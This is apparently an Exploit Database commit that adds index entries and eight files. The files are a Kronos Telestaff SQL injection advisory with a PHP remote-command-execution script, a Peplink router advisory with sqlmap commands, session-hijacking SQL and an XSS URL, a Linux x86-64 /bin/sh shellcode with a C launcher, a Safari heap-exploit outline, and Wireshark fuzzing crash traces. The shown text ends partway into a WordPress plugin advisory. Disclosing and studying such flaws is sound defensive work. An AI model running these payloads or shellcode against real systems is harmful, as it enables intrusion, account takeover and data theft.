DB: 2017-06-07

8 new exploits

Wireshark 2.2.6 - IPv6 Dissector Denial of Service
Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service
Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution
Home Web Server 1.9.1 build 164 - Remote Code Execution

Linux/x86-64 - /bin/sh Shellcode (31 bytes)
Kronos Telestaff < 2.92EU29 - SQL Injection
WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting
Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure
This commit is contained in:
Offensive Security 2017-06-07 05:01:18 +00:00
parent cd6e21e600
commit 0ef7d9b9ec
9 changed files with 799 additions and 0 deletions

View file

@ -5528,6 +5528,8 @@ id,file,description,date,author,platform,type,port
42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -15565,6 +15567,8 @@ id,file,description,date,author,platform,type,port
42060,platforms/linux/remote/42060.py,"Samba 3.5.0 - Remote Code Execution",2017-05-24,steelo,linux,remote,0
42078,platforms/linux/remote/42078.js,"Google Chrome 60.0.3080.5 V8 JavaScript Engine - Out-of-Bounds Write",2017-05-26,halbecaf,linux,remote,0
42079,platforms/hardware/remote/42079.txt,"CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities",2017-05-28,LiquidWorm,hardware,remote,0
42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0
42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16203,6 +16207,7 @@ id,file,description,date,author,platform,type,port
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0
42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37952,3 +37957,6 @@ id,file,description,date,author,platform,type,port
42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
42120,platforms/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps,0
42127,platforms/asp/webapps/42127.txt,"Kronos Telestaff < 2.92EU29 - SQL Injection",2017-06-05,"Goran Tuzovic",asp,webapps,0
42129,platforms/php/webapps/42129.txt,"WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting",2017-06-06,defensecode,php,webapps,80
42130,platforms/cgi/webapps/42130.txt,"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure",2017-06-06,"X41 D-Sec GmbH",cgi,webapps,443

Can't render this file because it is too large.

99
platforms/asp/webapps/42127.txt Executable file
View file

@ -0,0 +1,99 @@
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page
Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.
Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=
The exploit requires a valid "code" in the post body. However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests.
Proof of concept
================
PoC 1 - extract data from database
example extract benign data e.g.
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data:
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
compare timing with
device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
PoC 2 - Execute Code Remotely
example inject benign code e.g. ping a remote systems
<?php
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert you own host here to detect dns lookup and/or ping; or insert other command
$code=XXXX // insert valid code
$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
$payload=str_replace(" ","%20",$payload);
$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_exec($ch);
function strToHex($string){
$hex = '';
for ($i=0; $i<strlen($string); $i++){
$ord = ord($string[$i]);
$hexCode = dechex($ord);
$hex .= substr('0'.$hexCode, -2);
}
return "0x".strToUpper($hex);
}
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.
Solution
================
From Vendor:
Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
2016-01-20: Vendor is remediating the issue
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/

268
platforms/cgi/webapps/42130.txt Executable file
View file

@ -0,0 +1,268 @@
X41 D-Sec GmbH Security Advisory: X41-2017-005
Multiple Vulnerabilities in peplink balance routers
===================================================
Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.
The injection can be checked with the following command:
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a
The vulnerability in the Peplink device allows to access the SQLite
session database containing user and session variables. By using the the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attackers login.
bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2
By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session in case the
username existed and no session if it did not exist. In the first case
the server did not set a new session cookie in the response to the request.
SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')
Workarounds
-----------
Install vendor supplied update.
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross site request forgery attacks. This allows an attacker to
execute commands, if a logged in user visits a malicious website. This
can for example be used to change the credentials of the administrative
webinterface.
Workarounds
-----------
Install vendor supplied update.
Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.
Workarounds
-----------
Install vendor supplied update.
XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site-scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the the
orig_url parameter to trigger a cross-site-scripting issue in
/guest/preview.cgi. The injection is directly into existing JavaScript.
This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Summary and Impact
------------------
A logged in user can delete arbitrary files on the Peplink devices, by
abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided to the upfile.path parameter the file provided in the path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged in user.
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1
This displays the following:
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
Workarounds
-----------
Install vendor supplied update.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-04-07 Issue found
2017-04-10 Vendor asked for security contact
2017-04-11 Vendor replied, send GPG key
2017-04-11 Information supplied to vendor
2017-04-11 Vendor acknowledges that the information is received
2017-04-17 Vendor acknowledges SQL injection
2017-05-08 CVE IDs for all issues requested
2017-05-08 CVE IDs assigned
2017-05-11 Vendor informed about CVE IDs
2017-05-29 Version provided to X41 for testing
2017-05-31 First test results send back to the vendor
2017-06-01 Remaining test results send back to the vendor
2017-06-05 Coordinated Firmware and Advisory release

View file

@ -0,0 +1,62 @@
/*
;Title: Linux/x86-64 - /bin/sh Shellcode
;Author: Touhid M.Shaikh
;Contact: https://github.com/touhidshaikh
;Category: Shellcode
;Architecture: Linux x86_64
;Description: This shellcode baased on "JMP CALL POP" method to Execute "/bin//sh". Length of shellcode is 31 bytes.
;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04)
===COMPILATION AND EXECUTION===
#nasm -f elf64 shell.asm -o shell.o
#ld shell.o -o shell <=== Making Binary File
#./bin2shell.sh shell <== xtract hex code from the binary(https://github.com/touhidshaikh/bin2shell)
=================SHELLCODE(INTEL FORMAT)=================
section .text
global _start
_start:
jmp shell
here:
xor rax,rax
pop rdi
xor rsi,rsi
xor rdx,rdx
add rax,59
syscall
shell:
call here
bash db "/bin//sh"
===================END HERE============================
Compile with gcc with some options.
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
main()
{
printf("Touhid Shaikh (http://www.touhidshaikh.com)\n");
printf("Shellcode Length : %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

View file

@ -0,0 +1,21 @@
Sources:
https://phoenhex.re/2017-06-02/arrayspread
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow
JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isnt much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.
What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:
- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
- Allocate 4 GiB of padding using JSArrays.
- Trigger the bug by concatenating JSArrays with a combined size of 232 + 0x40000 (containing the repeated byte 0x41).
The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.
In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42125.zip

View file

@ -0,0 +1,66 @@
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
#31 0x561364f12549 in main tshark.c:1955:17
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)
SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42123.zip

View file

@ -0,0 +1,86 @@
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
/usr/include/string.h:395:33: note: nonnull attribute specified here
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
#48 0x564f18277e7b in main tshark.c:1954:13
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#50 0x564f18165709 in _start (run/tshark+0xd1709)
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42124.zip

143
platforms/php/webapps/42129.txt Executable file
View file

@ -0,0 +1,143 @@
DefenseCode WebScanner DAST Advisory
WordPress Tribulant Newsletters Plugin
Multiple Security Vulnerabilities
Advisory ID: DC-2017-01-012
Advisory Title: WordPress Tribulant Newsletters Plugin
Multiple Vulnerabilities
Advisory URL: http://www.defensecode.com/advisories.php
Software: WordPress Tribulant Newsletters Plugin
Language: PHP
Version: 4.6.4.2 and below
Vendor Status: Vendor contacted, update released
Release Date: 2017/05/29
Risk: Medium
1. General Overview
===================
During the security audit of Tribulant Newsletters plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode WebScanner application security analysis platform.
More information about WebScanner is available at URL:
http://www.defensecode.com
2. Software Overview
====================
According to the authors, WordPress Tribulant Newsletters plugin is a
full-featured newsletter plugin for WordPress which fulfils all
subscribers, emails, marketing and newsletter related needs for both
personal and business environments.
According to wordpress.org, it has more than 9,000 active installs.
Homepage:
https://wordpress.org/plugins/newsletters-lite/
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin
3. Vulnerability Description
==================================
During the security analysis, WebScanner discovered File Disclosure
vulnerability and multiple Cross Site Scripting vulnerabilities in
Tribulant Newsletters plugin.
3.1 File Disclosure
----
Input: $_GET['file']
